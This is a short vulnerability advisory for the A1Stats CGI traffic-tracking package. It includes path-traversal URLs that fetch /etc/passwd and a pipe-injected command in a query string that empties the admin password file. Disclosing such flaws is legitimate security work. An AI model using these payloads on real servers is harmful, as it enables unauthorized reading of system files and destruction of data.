[ Advisory for A1Stats ]
[ A1Stats is made by Drummond Miles ]
[ Site: http://www.gadnet.com/a1stats ]
[ by nemesystm of the DHC ]
[ (http://dhcorp.cjb.net - neme-dhc@hushmail.com) ]
[ ADV-0114 ]
/-|=[explanation]=|-\
A1Stats is a CGI package to track website traffic.
The package has a bug that lets a remote user view
arbitrary files, and it also makes it possible to
overwrite existing files.
/-|=[who is vulnerable]=|-\
Anyone using a copy of A1Stats that was downloaded
before 24/04/01.
/-|=[testing it]=|-\
To test these vulnerabilities, try the following.
www.server.com/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
www.server.com/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
These two will give you /etc/passwd.
www.server.com/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/passwd
This will also give you /etc/passwd but it will
show it in a very mangled manner as the CGI adds
HTML tags to what it thinks is a file it created
itself.
One can also open a file and wreck its contents.
http://localhost/cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt|
will empty a1admin.txt. a1admin.txt contains the
password to change settings of the CGI. When this
file is removed, no one can log in anymore.
/-|=[fix]=|-\
Downloading the latest version will solve this
problem.